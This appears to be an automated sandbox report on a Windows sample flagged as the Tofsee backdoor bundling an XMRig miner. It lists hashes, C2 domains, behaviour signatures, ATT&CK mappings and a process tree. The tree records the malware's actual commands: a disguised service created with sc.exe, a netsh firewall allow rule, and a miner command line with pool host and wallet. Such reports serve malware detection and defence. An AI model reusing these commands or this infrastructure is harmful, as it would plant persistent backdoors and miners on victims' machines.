Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    06-06-2022 09:29

General

  • Target

    5ecb07f30469b708f0dddbfe8ae64b12fa9e7bb8ac12c1e39c8a5b60b913b125.exe

  • Size

    262KB

  • MD5

    b238397190cef77889f56f811f88d8eb

  • SHA1

    2621a4fa22254ab5c18fd62f2e909627781f32d5

  • SHA256

    5ecb07f30469b708f0dddbfe8ae64b12fa9e7bb8ac12c1e39c8a5b60b913b125

  • SHA512

    c62d9ad34d4c4b665d3d4201fc4a99b8cf8a83ef50855cdfc8f32c57bbd4cf67ff4517edfe39f013392e5a2563e41c9e79e1df8867c95fda664c8c8bc0cfc411

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ecb07f30469b708f0dddbfe8ae64b12fa9e7bb8ac12c1e39c8a5b60b913b125.exe
    "C:\Users\Admin\AppData\Local\Temp\5ecb07f30469b708f0dddbfe8ae64b12fa9e7bb8ac12c1e39c8a5b60b913b125.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1020
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\phkkmgbm\
      2⤵
        PID:2660
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zikcafqr.exe" C:\Windows\SysWOW64\phkkmgbm\
        2⤵
          PID:4036
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create phkkmgbm binPath= "C:\Windows\SysWOW64\phkkmgbm\zikcafqr.exe /d\"C:\Users\Admin\AppData\Local\Temp\5ecb07f30469b708f0dddbfe8ae64b12fa9e7bb8ac12c1e39c8a5b60b913b125.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4448
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description phkkmgbm "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1364
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start phkkmgbm
          2⤵
          • Launches sc.exe
          PID:952
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4748
      • C:\Windows\SysWOW64\phkkmgbm\zikcafqr.exe
        C:\Windows\SysWOW64\phkkmgbm\zikcafqr.exe /d"C:\Users\Admin\AppData\Local\Temp\5ecb07f30469b708f0dddbfe8ae64b12fa9e7bb8ac12c1e39c8a5b60b913b125.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4832
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3592
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1524

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\zikcafqr.exe
        Filesize

        13.0MB

        MD5

        eb30fc5096b4eb0f7e0db20c399d08c2

        SHA1

        a15df25c9e3de4397768eeff6b90e8da5c7ddf05

        SHA256

        282b730d2fc419b5d307b9b7aaf779a3050fd5da383f73730edab724e7dff027

        SHA512

        893b798391a0fcc8f804a249ced0dcee91580ab5425121f9671eb0efa1db37cf0196f24fe78dd711892bf0d156ebadf27d8cad691bf65fa20e1796e809408335

      • C:\Windows\SysWOW64\phkkmgbm\zikcafqr.exe
        Filesize

        13.0MB

        MD5

        eb30fc5096b4eb0f7e0db20c399d08c2

        SHA1

        a15df25c9e3de4397768eeff6b90e8da5c7ddf05

        SHA256

        282b730d2fc419b5d307b9b7aaf779a3050fd5da383f73730edab724e7dff027

        SHA512

        893b798391a0fcc8f804a249ced0dcee91580ab5425121f9671eb0efa1db37cf0196f24fe78dd711892bf0d156ebadf27d8cad691bf65fa20e1796e809408335

      • memory/952-190-0x0000000000000000-mapping.dmp
      • memory/1020-160-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-152-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-123-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-124-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-161-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-126-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-127-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-128-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-129-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-130-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-131-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-132-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-133-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-134-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-135-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-136-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-137-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-138-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-139-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-140-0x00000000030B1000-0x00000000030C1000-memory.dmp
        Filesize

        64KB

      • memory/1020-141-0x00000000001E0000-0x00000000001F3000-memory.dmp
        Filesize

        76KB

      • memory/1020-142-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-143-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-144-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-145-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-146-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-147-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-148-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-149-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-150-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-151-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-162-0x0000000000400000-0x0000000002DB8000-memory.dmp
        Filesize

        41.7MB

      • memory/1020-153-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-154-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-155-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-156-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-157-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-158-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-159-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-118-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-125-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-122-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-163-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-164-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-165-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-166-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-167-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-227-0x0000000000400000-0x0000000002DB8000-memory.dmp
        Filesize

        41.7MB

      • memory/1020-119-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-215-0x00000000001E0000-0x00000000001F3000-memory.dmp
        Filesize

        76KB

      • memory/1020-212-0x00000000030B1000-0x00000000030C1000-memory.dmp
        Filesize

        64KB

      • memory/1020-120-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1020-121-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1364-188-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1364-187-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1364-189-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/1364-186-0x0000000000000000-mapping.dmp
      • memory/1524-522-0x0000000002B3259C-mapping.dmp
      • memory/2660-172-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/2660-179-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/2660-168-0x0000000000000000-mapping.dmp
      • memory/2660-169-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/2660-170-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/2660-171-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/3592-487-0x0000000002380000-0x0000000002395000-memory.dmp
        Filesize

        84KB

      • memory/3592-322-0x0000000002389A6B-mapping.dmp
      • memory/3592-393-0x0000000002380000-0x0000000002395000-memory.dmp
        Filesize

        84KB

      • memory/4036-175-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4036-181-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4036-177-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4036-176-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4036-173-0x0000000000000000-mapping.dmp
      • memory/4036-174-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4448-182-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4448-183-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4448-180-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4448-178-0x0000000000000000-mapping.dmp
      • memory/4448-185-0x0000000077010000-0x000000007719E000-memory.dmp
        Filesize

        1.6MB

      • memory/4748-206-0x0000000000000000-mapping.dmp
      • memory/4832-303-0x0000000002DC0000-0x0000000002E6E000-memory.dmp
        Filesize

        696KB

      • memory/4832-300-0x0000000002E90000-0x0000000002FDA000-memory.dmp
        Filesize

        1.3MB

      • memory/4832-341-0x0000000000400000-0x0000000002DB8000-memory.dmp
        Filesize

        41.7MB